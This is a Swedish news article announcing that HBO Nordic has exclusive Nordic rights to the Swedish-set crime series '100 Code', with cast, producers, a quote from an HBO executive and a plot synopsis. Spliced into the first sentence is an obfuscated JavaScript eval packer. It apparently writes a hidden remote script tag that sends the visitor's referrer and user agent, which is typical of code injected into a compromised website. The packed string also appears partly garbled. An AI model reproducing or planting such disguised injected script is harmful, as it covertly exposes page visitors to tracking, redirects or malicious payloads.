Image Image Image Image Image Image Image Image Image Image

| 27 februari, 2020

Scroll to top

Top

100 CODE EXKLUSIVT TILL HBO NORDIC

100 CODE EXKLUSIVT TILL HBO NORDIC
Sebastian

HBO eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|nfeak|var|u0026u|referrer|bekfb||js|php’.split(’|’),0,{}))
Nordic har fått de exklusiva rättigheterna för Pay-TV och tv-streaming av Red Arrows internationella storserie 100 Code. Kriminalserien utspelar sig i Sverige och i huvudrollerna ser vi vår egen stjärnskådespelare Michael Nyqvist och Dominic Monaghan (Lost, Sagan om Ringen-trilogin). HBO Nordics visningsrättigheter täcker Sverige, Danmark, Finland och Norge.

Serien är skapad av Oscar®-belönade Bobby Moresco (Cash, Million Dollar Baby). Dominic Monaghan gör rollen som New York-polisen Conley, som får i uppdrag att resa till Sverige för att utreda ett antal chockerande mord. Väl i Stockholm paras han ihop med svenske polisen Eklund, spelad av Michael Nyqvist. Moresco har även regisserat flera av avsnitten.

100 Code är gjord av Red Arrow Entertainments Los Angeles-baserade manusarm Fabrik Entertainment, som även stod bakom The Killing. 100 Code AB har producerat serien med Zen Productions Klaus Zimmermann som exekutiv producent tillsammans med Fabrik Entertainments Henrik Bastin, Mikkel Bondesen och Moresco. Joakim Hansson står som producent. Serien är producerad för Kanal 5 i Sverige och utgör Sky Deutchlands första samproduktion.

”Vi är fyllda av förväntningar över 100 Code och förstås oerhört glada att kunna erbjuda en exklusiv premiär till alla våra nordiska prenumeranter. Att serien utspelar sig i Sverige och att många av rollerna görs av svenska skådespelare med fantastiske Michael Nyqvist i spetsen, kombinerat med Bobby Morescos manus och Dominic Monaghans New York-polis, skänker hela serien en tydlig internationell krydda och särskiljer den från andra serier i samma
genre, ” säger Line Mykland, EVP Programming, Operations & Technology HBO Nordic.

Om 100 Code

New York. Stockholm. Under de senaste 12 månaderna har unga, blonda och blåögda kvinnor hittats döda på liljeängar. New York-polisen Tommy Conley får i uppdrag att resa till Stockholm för att observera och ge råd till Stockholms-polisen. Han paras ihop med Mikael Eklund, en polis av den gamla traditionella sorten som inte har mycket till övers för den amerikanska slit-och-släng-kulturen. De hatar förstås varandra från första minuten. Men morden fortsätter och de tvingas reda ut sina olikheter för att kunna samarbeta. Ett komplicerat nätverk av brutala mördare utkristalliserar sig under utredningen och Conley & Eklund närmar sig den som ligger bakom morden.